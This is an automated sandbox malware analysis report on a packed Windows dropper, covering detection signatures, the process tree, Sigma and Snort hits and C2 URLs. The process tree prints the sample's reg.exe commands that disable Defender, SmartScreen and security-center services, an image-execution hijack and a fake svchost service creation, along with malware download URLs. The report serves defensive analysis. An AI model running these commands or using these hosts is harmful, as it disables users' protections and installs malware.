Edit tour

Windows Analysis Report
ywvz5i8kT9

Overview

General Information

Sample Name:	ywvz5i8kT9 (renamed file extension from none to exe)
Analysis ID:	611412
MD5:	375b713f2e3c2018da424666c6be9059
SHA1:	f3c8a117fa361e2afad77fc90673ab3ca81152f4
SHA256:	7f9c8c44079baed3e635a5d894ddad9c0db48022a19e80af11c79699727de3e0
Tags:	exe
Infos:

Detection

Score:	66
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Detected unpacking (changes PE section rights)

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Multi AV Scanner detection for domain / URL

Sigma detected: Registry Defender Tampering

Uses cmd line tools excessively to alter registry or file data

Sample is not signed and drops a device driver

Uses known network protocols on non-standard ports

Install WinpCap (used to filter network traffic)

Machine Learning detection for sample

Drops executables to the windows directory (C:\Windows) and starts them

PE file contains section with special chars

Sigma detected: File Created with System Process Name

Changes security center settings (notifications, updates, antivirus, firewall)

Sigma detected: Suspicious Outbound Kerberos Connection

PE file has nameless sections

Creates an undocumented autostart registry key

Creates files inside the driver directory

Drops PE files to the application program directory (C:\ProgramData)

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Stores files to the Windows start menu directory

Changes image file execution options

Contains functionality to dynamically determine API calls

Uses the system / local time for branch decision (may execute only at specific dates)

HTTP GET or POST without a user agent

Downloads executable code via HTTP

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Modifies existing windows services

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Drops PE files to the windows directory (C:\Windows)

Found evasive API chain checking for process token information

Creates driver files

Binary contains a suspicious time stamp

Uses reg.exe to modify the Windows registry

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Creates a process in suspended mode (likely to inject code)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to shutdown / reboot the system

Creates files inside the system directory

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Found potential string decryption / allocating functions

Contains functionality to call native functions

Contains functionality to communicate with device drivers

Found dropped PE file which has not been started or loaded

Contains functionality which may be used to detect a debugger (GetProcessHeap)

PE file contains executable resources (Code or Archives)

Enables debug privileges

Is looking for software installed on the system

AV process strings found (often used to terminate AV products)

PE file does not import any functions

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

Detected TCP or UDP traffic on non-standard ports

Found evaded block containing many API calls

Creates or modifies windows services

Queries disk information (often used to detect virtual machines)

Uses Microsoft's Enhanced Cryptographic Provider

Sigma detected: Autorun Keys Modification

Classification

Process Tree

System is w10x64

ywvz5i8kT9.exe (PID: 6280 cmdline: "C:\Users\user\Desktop\ywvz5i8kT9.exe" MD5: 375B713F2E3C2018DA424666C6BE9059)

cmd.exe (PID: 6828 cmdline: cmd.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 6836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

reg.exe (PID: 6888 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off" /f MD5: E3DACF0B31841FA02064B4457D44B357)

reg.exe (PID: 6912 cmdline: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f MD5: E3DACF0B31841FA02064B4457D44B357)

reg.exe (PID: 6924 cmdline: reg add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f MD5: E3DACF0B31841FA02064B4457D44B357)

reg.exe (PID: 6940 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f MD5: E3DACF0B31841FA02064B4457D44B357)

reg.exe (PID: 6956 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f MD5: E3DACF0B31841FA02064B4457D44B357)

reg.exe (PID: 6972 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f MD5: E3DACF0B31841FA02064B4457D44B357)

reg.exe (PID: 6988 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v DontReportInfectionInformation /t REG_DWORD /d 1 /f MD5: E3DACF0B31841FA02064B4457D44B357)

reg.exe (PID: 7000 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /f MD5: E3DACF0B31841FA02064B4457D44B357)

reg.exe (PID: 7020 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f MD5: E3DACF0B31841FA02064B4457D44B357)

reg.exe (PID: 7036 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t REG_DWORD /d 1 /f MD5: E3DACF0B31841FA02064B4457D44B357)

reg.exe (PID: 7052 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t REG_DWORD /d 1 /f MD5: E3DACF0B31841FA02064B4457D44B357)

reg.exe (PID: 7064 cmdline: reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f MD5: E3DACF0B31841FA02064B4457D44B357)

reg.exe (PID: 7104 cmdline: reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f MD5: E3DACF0B31841FA02064B4457D44B357)

reg.exe (PID: 3032 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SecHealthUI.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\taskkill.exe" /f MD5: E3DACF0B31841FA02064B4457D44B357)

WinPcap_4_1_3.exe (PID: 3836 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe" MD5: A11A2F0CFE6D0B4C50945989DB6360CD)

vcredist_2010_x64.exe (PID: 3108 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe" /q /norestart MD5: CBE0B05C11D5D523C2AF997D737C137B)

vcredist_2013_x64.exe (PID: 6716 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe" /q /norestart MD5: 4CCF1937068BF8D0773341F86A448634)

vcredist_2013_x64.exe (PID: 6384 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe" /q /norestart -burn.unelevated BurnPipe.{2D277E6C-5CDF-4BE9-BD86-D80206082B4F} {7764B93C-9D98-4483-A035-10A63673DA0D} 6716 MD5: 4CCF1937068BF8D0773341F86A448634)

sc.exe (PID: 3568 cmdline: "C:\Windows\system32\sc.exe" create svchost binPath= C:\Windows\SysWOW64\RuntimeBroker.exe start= auto DisplayName= svchost MD5: D79784553A9410D15E04766AAAB77CD6)

conhost.exe (PID: 6568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

sc.exe (PID: 6400 cmdline: C:\Windows\system32\sc.exe" description svchost "? ???? ??? ?? ?? ???? ?? ?? ?? ??? ?? ???(VPN) ??? ?????. ? ???? ???? ??? ? ???? ????? ??? ?? ???? ???? ????. MD5: D79784553A9410D15E04766AAAB77CD6)

conhost.exe (PID: 6356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

sc.exe (PID: 6360 cmdline: "C:\Windows\system32\sc.exe" config svchost start= auto MD5: D79784553A9410D15E04766AAAB77CD6)

conhost.exe (PID: 6912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

sc.exe (PID: 6916 cmdline: "C:\Windows\system32\sc.exe" start svchost MD5: D79784553A9410D15E04766AAAB77CD6)

conhost.exe (PID: 6956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

svchost.exe (PID: 6788 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 3256 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 2732 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 1312 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 3740 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5208 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

SgrmBroker.exe (PID: 1048 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)

svchost.exe (PID: 4952 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6440 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6736 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)

RuntimeBroker.exe (PID: 7008 cmdline: C:\Windows\SysWOW64\RuntimeBroker.exe MD5: 737DF71F01C8DE6613D9A5F1870A6CB2)

svchost.exe (PID: 2064 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
ywvz5i8kT9.exe	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x13c7d:$name: ConfuserEx 0x13211:$compile: AssemblyTitle

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.ywvz5i8kT9.exe.f70000.0.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x13c7d:$name: ConfuserEx 0x13211:$compile: AssemblyTitle
0.0.ywvz5i8kT9.exe.f70000.0.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x13c7d:$name: ConfuserEx 0x13211:$compile: AssemblyTitle

Sigma Signatures

System Summary

Sigma detected: Registry Defender Tampering

Source: Process started

Author: Florian Roth: Data: Command: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f, CommandLine: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: cmd.exe, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6828, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f, ProcessId: 6956, ProcessName: reg.exe

Sigma detected: File Created with System Process Name

Source: File created

Author: Sander Wiebing, Tim Shelton: Data: EventID: 11, Image: C:\Users\user\Desktop\ywvz5i8kT9.exe, ProcessId: 6280, TargetFilename: C:\Windows\SysWOW64\RuntimeBroker.exe

Sigma detected: Suspicious Outbound Kerberos Connection

Source: Network Connection

Author: Ilyas Ochkov, oscd.community: Data: DestinationIp: 113.212.88.126, DestinationIsIpv6: false, DestinationPort: 88, EventID: 3, Image: C:\Windows\SysWOW64\RuntimeBroker.exe, Initiated: true, ProcessId: 7008, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49769

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton: Data: Details: C:\Windows\System32\taskkill.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 3032, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SecHealthUI.exe\Debugger

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\ywvz5i8kT9.exe, ProcessId: 6280, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\system32\install_wim_tweak.exe

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: "C:\Windows\system32\sc.exe" create svchost binPath= C:\Windows\SysWOW64\RuntimeBroker.exe start= auto DisplayName= svchost, CommandLine: "C:\Windows\system32\sc.exe" create svchost binPath= C:\Windows\SysWOW64\RuntimeBroker.exe start= auto DisplayName= svchost, CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\ywvz5i8kT9.exe" , ParentImage: C:\Users\user\Desktop\ywvz5i8kT9.exe, ParentProcessId: 6280, ParentProcessName: ywvz5i8kT9.exe, ProcessCommandLine: "C:\Windows\system32\sc.exe" create svchost binPath= C:\Windows\SysWOW64\RuntimeBroker.exe start= auto DisplayName= svchost, ProcessId: 3568, ProcessName: sc.exe

Source: Process started

Author: frack113: Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: cmd.exe, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6828, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 6836, ProcessName: conhost.exe

Snort Signatures

ET MALWARE Trojan-Dropper.MSIL CnC Traffic - GET - Source IP: 192.168.2.4 - Destination IP: 45.135.48.153

Timestamp:	04/19/22-16:44:26.306507 04/19/22-16:44:26.306507
SID:	2034340
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Trojan-Dropper.MSIL CnC Traffic - GET - Source IP: 192.168.2.4 - Destination IP: 45.135.48.153

Timestamp:	04/19/22-16:44:36.911779 04/19/22-16:44:36.911779
SID:	2034340
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Trojan-Dropper.MSIL CnC Traffic - GET - Source IP: 192.168.2.4 - Destination IP: 45.135.48.153

Timestamp:	04/19/22-16:44:41.532338 04/19/22-16:44:41.532338
SID:	2034340
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Trojan-Dropper.MSIL CnC Traffic - GET - Source IP: 192.168.2.4 - Destination IP: 45.135.48.153

Timestamp:	04/19/22-16:44:27.387415 04/19/22-16:44:27.387415
SID:	2034340
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Trojan-Dropper.MSIL CnC Traffic - GET - Source IP: 192.168.2.4 - Destination IP: 45.135.48.153

Timestamp:	04/19/22-16:44:38.649934 04/19/22-16:44:38.649934
SID:	2034340
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Trojan-Dropper.MSIL CnC Traffic - GET - Source IP: 192.168.2.4 - Destination IP: 45.135.48.153

Timestamp:	04/19/22-16:44:37.995145 04/19/22-16:44:37.995145
SID:	2034340
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://45.135.48.153/Vv/1/RuntimeBroker_64.dll	Avira URL Cloud: Label: malware
Source: http://45.135.48.153/Vv/1/PcapDotNet.Core_64.dll	Avira URL Cloud: Label: malware
Source: http://45.135.48.153/Vv/1/PcapDotNet.Core.Extensions_64.dll	Avira URL Cloud: Label: malware
Source: http://45.135.48.153/Vv/1/Remove.dll	Avira URL Cloud: Label: malware
Source: http://45.135.48.153/Vv/1/RuntimeBrokerBin_64.dll	Avira URL Cloud: Label: malware
Source: http://45.135.48.153/Vv/1/install_wim_tweak.dll	Avira URL Cloud: Label: malware
Source: http://45.135.48.153/Vv/1/	Avira URL Cloud: Label: malware
Source: http://a1212.me/Vv/RuntimeBrokerBin_64.exe	Avira URL Cloud: Label: malware
Source: http://a1212.me/Vv/RuntimeBrokerBin_32.exe	Avira URL Cloud: Label: malware
Source: http://45.135.48.153/Vv/Ip.json	Avira URL Cloud: Label: malware
Source: http://45.135.48.153	Avira URL Cloud: Label: malware
Source: http://45.135.48.153/Vv/1/PcapDotNet.Base_64.dll	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: ywvz5i8kT9.exe	Virustotal: Detection: 71%	Perma Link
Source: ywvz5i8kT9.exe	Metadefender: Detection: 25%	Perma Link
Source: ywvz5i8kT9.exe	ReversingLabs: Detection: 84%

Multi AV Scanner detection for domain / URL

Source: http://45.135.48.153/Vv/1/vcredist_2013_x64.exe	Virustotal: Detection: 7%	Perma Link
Source: http://45.135.48.153/Vv/1/RuntimeBroker_64.dll	Virustotal: Detection: 9%	Perma Link
Source: http://45.135.48.153/Vv/1/PcapDotNet.Core_64.dll	Virustotal: Detection: 8%	Perma Link

Machine Learning detection for sample

Source: ywvz5i8kT9.exe

Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	Code function: 31_2_01004F6B InitializeSecurityDescriptor,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,GetCurrentDirectoryA,GetSystemDirectoryA,QueryDosDeviceA,_strlwr,strstr,strstr,strstr,GetDiskFreeSpaceA,CryptAcquireContextA,sprintf,CryptGenRandom,sprintf,sprintf,CryptReleaseContext,GetSystemTime,SystemTimeToFileTime,DialogBoxParamA,DosDateTimeToFileTime,LocalFileTimeToFileTime,SetFileTime,FindCloseChangeNotification,SendDlgItemMessageA,MoveFileExA,strstr,_stricmp,SendDlgItemMessageA,GetLastError,CreateFileA,SetFilePointer,SetFilePointer,SetEndOfFile,SetFilePointer,	31_2_01004F6B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	Code function: 31_2_010045EB GetFileAttributesA,LoadLibraryA,GetProcAddress,DecryptFileA,GetLastError,	31_2_010045EB
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe	Code function: 32_2_01298101 CryptHashPublicKeyInfo,GetLastError,	32_2_01298101
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe	Code function: 32_2_012B7378 _memset,CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,ReadFile,CryptHashData,ReadFile,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,GetLastError,CryptDestroyHash,CryptReleaseContext,	32_2_012B7378
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe	Code function: 32_2_01298386 DecryptFileW,	32_2_01298386
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe	Code function: 32_2_01297E2A _memset,CryptCATAdminCalcHashFromFileHandle,GetLastError,GetLastError,CryptCATAdminCalcHashFromFileHandle,GetLastError,WinVerifyTrust,WinVerifyTrust,WinVerifyTrust,	32_2_01297E2A

Source: ywvz5i8kT9.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SystemRestore SRInitDone

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	File created: c:\4863269369430a9b27\1033\eula.rtf
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	File created: c:\4863269369430a9b27\1041\eula.rtf
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	File created: c:\4863269369430a9b27\1042\eula.rtf
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	File created: c:\4863269369430a9b27\1028\eula.rtf
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	File created: c:\4863269369430a9b27\2052\eula.rtf
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	File created: c:\4863269369430a9b27\1040\eula.rtf
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	File created: c:\4863269369430a9b27\1036\eula.rtf
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	File created: c:\4863269369430a9b27\1031\eula.rtf
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	File created: c:\4863269369430a9b27\3082\eula.rtf
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	File created: c:\4863269369430a9b27\1049\eula.rtf
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe	File created: C:\Users\user\AppData\Local\Temp\{ea14036a-96ff-4c95-a988-78d36f0ccffa}\.ba1\license.rtf

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe

File created: C:\Program Files (x86)\WinPcap\install.log

Jump to behavior

Source: ywvz5i8kT9.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: c:\releases\winpcap_4_1_3\winpcap\install\WinPcap Installer Helper\Release\x86\WinPcapInstall.pdb`3\9 source: WinPcapInstall.dll.30.dr
Source:	Binary string: c:\releases\winpcap_4_1_3\winpcap\packetNtx\Dll\Project\Release No NetMon\x64\Packet.pdb! source: Packet.dll0.30.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb^ source: ywvz5i8kT9.exe, 00000000.00000002.492339500.000000000141A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: sfxcab.pdb source: vcredist_2010_x64.exe, vcredist_2010_x64.exe, 0000001F.00000002.429862569.0000000001002000.00000020.00000001.01000000.00000008.sdmp, vcredist_2010_x64.exe, 0000001F.00000000.315342790.0000000001002000.00000020.00000001.01000000.00000008.sdmp, vcredist_2010_x64.exe.0.dr
Source:	Binary string: E:\delivery\Dev\wix37\build\ship\x86\burn.pdb@- source: vcredist_2013_x64.exe, 00000020.00000000.318122793.00000000012BA000.00000002.00000001.01000000.0000000A.sdmp, vcredist_2013_x64.exe, 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmp, vcredist_2013_x64.exe, 00000023.00000002.353278306.00000000012BA000.00000002.00000001.01000000.0000000A.sdmp, vcredist_2013_x64.exe, 00000023.00000000.320109494.00000000012BA000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: C:\Users\Boaz\TFS\tfs06.codeplex.com\PcapDotNet\PcapDotNet\src\PcapDotNet.Base\obj\Release\PcapDotNet.Base.pdb source: ywvz5i8kT9.exe, 00000000.00000002.493961459.0000000003504000.00000004.00000800.00020000.00000000.sdmp, PcapDotNet.Base.dll.0.dr
Source:	Binary string: patchhooks.pdb source: vc_red.msi.31.dr
Source:	Binary string: D:\.000.Private\000.NET\VvMain\vv0\4.0\VvService_64\VvService\obj\Debug\RuntimeBroker.pdb source: ywvz5i8kT9.exe, 00000000.00000002.493875825.00000000034C3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe.0.dr
Source:	Binary string: C:\Users\Boaz\TFS\tfs06.codeplex.com\PcapDotNet\PcapDotNet\bin\Release\PcapDotNet.Core.pdbh@ source: ywvz5i8kT9.exe, 00000000.00000002.493961459.0000000003504000.00000004.00000800.00020000.00000000.sdmp, PcapDotNet.Core.dll.0.dr
Source:	Binary string: c:\releases\winpcap_4_1_3\winpcap\packetNtx\Dll\Project\Release No NetMon\x86\Packet.pdb source: Packet.dll.30.dr
Source:	Binary string: Setup.pdb source: Setup.exe.31.dr
Source:	Binary string: C:\Users\liamc\Desktop\win6x_registry_tweak\obj\Debug\install_wim_tweak.pdb8 source: ywvz5i8kT9.exe, 00000000.00000002.493794845.00000000034A5000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\releases\winpcap_4_1_3\winpcap\packetNtx\Dll\Project\Release No NetMon\x64\Packet.pdb source: Packet.dll0.30.dr
Source:	Binary string: SetupEngine.pdb source: SetupEngine.dll.31.dr
Source:	Binary string: C:\Users\Boaz\TFS\tfs06.codeplex.com\PcapDotNet\PcapDotNet\bin\Release\PcapDotNet.Core.pdb source: ywvz5i8kT9.exe, 00000000.00000002.493961459.0000000003504000.00000004.00000800.00020000.00000000.sdmp, PcapDotNet.Core.dll.0.dr
Source:	Binary string: E:\delivery\Dev\wix37\build\ship\x86\burn.pdb source: vcredist_2013_x64.exe, 00000020.00000000.318122793.00000000012BA000.00000002.00000001.01000000.0000000A.sdmp, vcredist_2013_x64.exe, 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmp, vcredist_2013_x64.exe, 00000023.00000002.353278306.00000000012BA000.00000002.00000001.01000000.0000000A.sdmp, vcredist_2013_x64.exe, 00000023.00000000.320109494.00000000012BA000.00000002.00000001.01000000.0000000A.sdmp, vcredist_x64.exe.35.dr, vcredist_2013_x64.exe.0.dr
Source:	Binary string: E:\delivery\Dev\wix37\build\ship\x86\burn.pdb@E source: vcredist_x64.exe.35.dr, vcredist_2013_x64.exe.0.dr
Source:	Binary string: C:\Users\Boaz\TFS\tfs06.codeplex.com\PcapDotNet\PcapDotNet\src\PcapDotNet.Core.Extensions\obj\Release\PcapDotNet.Core.Extensions.pdb source: ywvz5i8kT9.exe, 00000000.00000002.494015900.000000000352F000.00000004.00000800.00020000.00000000.sdmp, PcapDotNet.Core.Extensions.dll.0.dr
Source:	Binary string: c:\releases\winpcap_4_1_3\winpcap\install\WinPcap Installer Helper\Release\x86\WinPcapInstall.pdb source: WinPcapInstall.dll.30.dr
Source:	Binary string: c:\releases\winpcap_4_1_3\winpcap\wpcap\PRJ\Release\x86\wpcap.pdb source: wpcap.dll0.30.dr
Source:	Binary string: C:\Users\Boaz\TFS\tfs06.codeplex.com\PcapDotNet\PcapDotNet\src\PcapDotNet.Packets\obj\Release\PcapDotNet.Packets.pdb source: ywvz5i8kT9.exe, 00000000.00000002.494029925.0000000003535000.00000004.00000800.00020000.00000000.sdmp, PcapDotNet.Packets.dll.0.dr
Source:	Binary string: C:\Users\Boaz\TFS\tfs06.codeplex.com\PcapDotNet\PcapDotNet\src\PcapDotNet.Base\obj\Release\PcapDotNet.Base.pdbhI~I pI_CorDllMainmscoree.dll source: ywvz5i8kT9.exe, 00000000.00000002.493961459.0000000003504000.00000004.00000800.00020000.00000000.sdmp, PcapDotNet.Base.dll.0.dr
Source:	Binary string: D:\.000.Private\000.NET\VvMain\vv0\4.0\VvSvcHost_64\VvSvcHost\obj\Release\VvSvcHost.pdb source: ywvz5i8kT9.exe, 00000000.00000002.493875825.00000000034C3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, RuntimeBroker.exe, 0000002B.00000002.491314449.0000000000F72000.00000002.00000001.01000000.0000000E.sdmp, RuntimeBroker.exe0.0.dr
Source:	Binary string: C:\Users\liamc\Desktop\win6x_registry_tweak\obj\Debug\install_wim_tweak.pdb source: ywvz5i8kT9.exe, 00000000.00000002.493794845.00000000034A5000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: SetupResources.pdb source: SetupResources.dll4.31.dr, SetupResources.dll7.31.dr, SetupResources.dll3.31.dr, SetupResources.dll1.31.dr, SetupResources.dll2.31.dr, SetupResources.dll0.31.dr, SetupResources.dll.31.dr, SetupResources.dll6.31.dr, SetupResources.dll8.31.dr
Source:	Binary string: SetupUi.pdb source: SetupUi.dll.31.dr

